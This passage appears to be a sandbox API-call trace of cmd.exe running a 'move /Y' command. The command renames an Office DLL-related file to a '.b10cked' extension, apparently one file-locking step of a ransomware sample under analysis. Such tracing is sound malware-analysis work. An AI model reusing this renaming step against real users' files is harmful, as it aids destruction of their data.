| out: lpBuffer=0x24fc44*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0176.953] GetConsoleOutputCP () returned 0x1b5 [0176.953] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0176.954] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0176.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.954] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0176.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.954] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0176.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.954] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0176.954] _get_osfhandle (_FileHandle=0) returned 0x3 [0176.954] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0176.954] _get_osfhandle (_FileHandle=0) returned 0x3 [0176.954] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0176.955] GetEnvironmentStringsW () returned 0x390210* [0176.955] FreeEnvironmentStringsW (penv=0x390210) returned 1 [0176.955] GetEnvironmentStringsW () returned 0x390210* [0176.955] FreeEnvironmentStringsW (penv=0x390210) returned 1 [0176.955] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ebe4 | out: phkResult=0x24ebe4*=0x40) returned 0x0 [0176.955] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x0, lpData=0x24ebf0*=0xa0, lpcbData=0x24ebe8*=0x1000) returned 0x2 [0176.955] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x4, lpData=0x24ebf0*=0x1, 
lpcbData=0x24ebe8*=0x4) returned 0x0 [0176.955] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x0, lpData=0x24ebf0*=0x1, lpcbData=0x24ebe8*=0x1000) returned 0x2 [0176.955] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x4, lpData=0x24ebf0*=0x0, lpcbData=0x24ebe8*=0x4) returned 0x0 [0176.955] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x4, lpData=0x24ebf0*=0x40, lpcbData=0x24ebe8*=0x4) returned 0x0 [0176.955] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x4, lpData=0x24ebf0*=0x40, lpcbData=0x24ebe8*=0x4) returned 0x0 [0176.955] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x0, lpData=0x24ebf0*=0x40, lpcbData=0x24ebe8*=0x1000) returned 0x2 [0176.955] RegCloseKey (hKey=0x40) returned 0x0 [0176.955] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ebe4 | out: phkResult=0x24ebe4*=0x40) returned 0x0 [0176.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x0, lpData=0x24ebf0*=0x40, lpcbData=0x24ebe8*=0x1000) returned 0x2 [0176.956] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x4, lpData=0x24ebf0*=0x1, lpcbData=0x24ebe8*=0x4) returned 0x0 [0176.956] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x0, lpData=0x24ebf0*=0x1, lpcbData=0x24ebe8*=0x1000) returned 0x2 [0176.956] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x4, lpData=0x24ebf0*=0x0, lpcbData=0x24ebe8*=0x4) returned 0x0 [0176.956] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x4, lpData=0x24ebf0*=0x9, lpcbData=0x24ebe8*=0x4) returned 0x0 [0176.956] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x4, lpData=0x24ebf0*=0x9, lpcbData=0x24ebe8*=0x4) returned 0x0 [0176.956] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ebec, lpData=0x24ebf0, lpcbData=0x24ebe8*=0x1000 | out: lpType=0x24ebec*=0x0, lpData=0x24ebf0*=0x9, lpcbData=0x24ebe8*=0x1000) returned 0x2 [0176.956] RegCloseKey (hKey=0x40) returned 0x0 [0176.956] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638c [0176.956] srand (_Seed=0x5b88638c) [0176.956] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked\"" [0176.956] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked\"" [0176.956] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.956] GetModuleFileNameW (in: hModule=0x0, 
lpFilename=0x391970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0176.957] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0176.957] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0176.957] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0176.957] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0176.957] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0176.957] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0176.957] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0176.957] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0176.957] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0176.957] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0176.957] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0176.957] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0176.957] GetEnvironmentStringsW () returned 0x392360* [0176.957] FreeEnvironmentStringsW (penv=0x392360) returned 1 [0176.957] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0176.957] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0176.957] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0176.957] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0176.957] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0176.957] _wcsicmp (_String1="KEYS", 
_String2="CMDCMDLINE") returned 8 [0176.957] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0176.958] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0176.958] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0176.958] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0176.958] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f9b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.958] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f9b0, lpFilePart=0x24f9ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f9ac*="Desktop") returned 0x18 [0176.958] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0176.958] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f72c | out: lpFindFileData=0x24f72c) returned 0x3909f0 [0176.958] FindClose (in: hFindFile=0x3909f0 | out: hFindFile=0x3909f0) returned 1 [0176.958] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f72c | out: lpFindFileData=0x24f72c) returned 0x3909f0 [0176.958] FindClose (in: hFindFile=0x3909f0 | out: hFindFile=0x3909f0) returned 1 [0176.958] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f72c | out: lpFindFileData=0x24f72c) returned 0x3909f0 [0176.959] FindClose (in: hFindFile=0x3909f0 | out: hFindFile=0x3909f0) returned 1 [0176.959] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0176.959] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0176.959] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0176.959] GetEnvironmentStringsW () returned 0x390210* [0176.959] FreeEnvironmentStringsW (penv=0x390210) returned 1 [0176.959] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.960] GetConsoleOutputCP () returned 0x1b5 [0176.960] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0176.960] GetUserDefaultLCID () returned 0x409 [0176.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0176.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24faf0, cchData=128 | out: lpLCData="0") returned 2 [0176.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24faf0, cchData=128 | out: lpLCData="0") returned 2 [0176.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24faf0, cchData=128 | out: lpLCData="1") returned 2 [0176.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0176.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0176.961] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0176.961] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0176.961] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0176.961] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0176.961] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0176.961] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0176.961] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0176.961] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: 
lpLCData=",") returned 2 [0176.961] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0176.962] GetConsoleTitleW (in: lpConsoleTitle=0x380930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0176.962] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0176.962] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0176.962] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0176.962] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0176.963] _wcsicmp (_String1="move", _String2=")") returned 68 [0176.963] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0176.963] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0176.963] _wcsicmp (_String1="IF", _String2="move") returned -4 [0176.963] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0176.963] _wcsicmp (_String1="REM", _String2="move") returned 5 [0176.963] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0176.967] GetConsoleTitleW (in: lpConsoleTitle=0x24f7e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0176.968] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0176.968] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0176.968] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0176.968] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0176.968] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0176.968] _wcsicmp (_String1="move", _String2="CD") returned 10 [0176.968] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0176.968] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0176.968] _wcsicmp (_String1="move", _String2="REN") returned -5 [0176.968] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0176.968] _wcsicmp (_String1="move", _String2="SET") returned -6 [0176.968] _wcsicmp (_String1="move", 
_String2="PAUSE") returned -3 [0176.968] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0176.968] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0176.968] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0176.968] _wcsicmp (_String1="move", _String2="MD") returned 11 [0176.968] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0176.968] _wcsicmp (_String1="move", _String2="RD") returned -5 [0176.968] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0176.968] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0176.968] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0176.968] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0176.968] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0176.968] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0176.968] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0176.968] _wcsicmp (_String1="move", _String2="VER") returned -9 [0176.968] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0176.968] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0176.968] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0176.968] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0176.968] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0176.969] _wcsicmp (_String1="move", _String2="START") returned -6 [0176.969] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0176.969] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0176.969] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0176.970] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0176.970] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0176.970] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f5a4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f59c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", 
lpVolumeSerialNumber=0x24f59c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) 
returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0176.972] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0176.972] _wcsicmp (_String1="XLSLIC~1.TRX", _String2=".") returned 74 [0176.972] _wcsicmp (_String1="XLSLIC~1.TRX", _String2="..") returned 74 [0176.972] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlslic~1.trx")) returned 0x2020 [0176.972] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x391f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.972] SetErrorMode (uMode=0x0) returned 0x0 [0176.972] SetErrorMode (uMode=0x1) returned 0x0 [0176.972] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX", nBufferLength=0x104, lpBuffer=0x24ef2c, lpFilePart=0x24ef14 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX", lpFilePart=0x24ef14*="XLSLIC~1.TRX") returned 0x3c [0176.972] 
SetErrorMode (uMode=0x0) returned 0x1 [0176.972] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0176.972] _wcsicmp (_String1="XLSLIC~1.TRX", _String2=".") returned 74 [0176.972] _wcsicmp (_String1="XLSLIC~1.TRX", _String2="..") returned 74 [0176.972] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlslic~1.trx")) returned 0x2020 [0176.972] SetErrorMode (uMode=0x0) returned 0x0 [0176.973] SetErrorMode (uMode=0x1) returned 0x0 [0176.973] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX", nBufferLength=0x104, lpBuffer=0x24f3a8, lpFilePart=0x24f140 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX", lpFilePart=0x24f140*="XLSLIC~1.TRX") returned 0x3c [0176.973] SetErrorMode (uMode=0x0) returned 0x1 [0176.973] SetErrorMode (uMode=0x0) returned 0x0 [0176.973] SetErrorMode (uMode=0x1) returned 0x0 [0176.973] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x24f5b0, lpFilePart=0x24f140 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked", lpFilePart=0x24f140*="XLSLICER.DLL.trx_dll.b10cked") returned 0x4c [0176.973] SetErrorMode (uMode=0x0) returned 0x1 [0176.973] SetLastError (dwErrCode=0x0) [0176.973] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlslicer.dll.trx_dll.b10cked")) returned 0xffffffff [0176.973] GetLastError () returned 0x2 [0176.973] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX", 
fInfoLevelId=0x1, lpFindFileData=0x24eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24eabc) returned 0x392130 [0176.973] FindNextFileW (in: hFindFile=0x392130, lpFindFileData=0x24eabc | out: lpFindFileData=0x24eabc) returned 0 [0176.974] GetLastError () returned 0x12 [0176.974] FindClose (in: hFindFile=0x392130 | out: hFindFile=0x392130) returned 1 [0176.975] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x391cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x391cc0) returned 0x392130 [0176.975] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x24ed54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0176.975] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x24ed54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0176.975] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlslicer.dll.trx_dll")) returned 0x2020 [0176.975] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlslicer.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlslicer.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0177.034] FindClose (in: hFindFile=0x392130 | out: 
hFindFile=0x392130) returned 1 [0177.034] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24ed08 | out: _Buffer=" 1") returned 9 [0177.034] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.034] GetFileType (hFile=0x7) returned 0x2 [0177.035] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0177.035] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24ec94 | out: lpMode=0x24ec94) returned 1 [0177.035] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.035] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24ecc8 | out: lpConsoleScreenBufferInfo=0x24ecc8) returned 1 [0177.035] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0177.035] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, 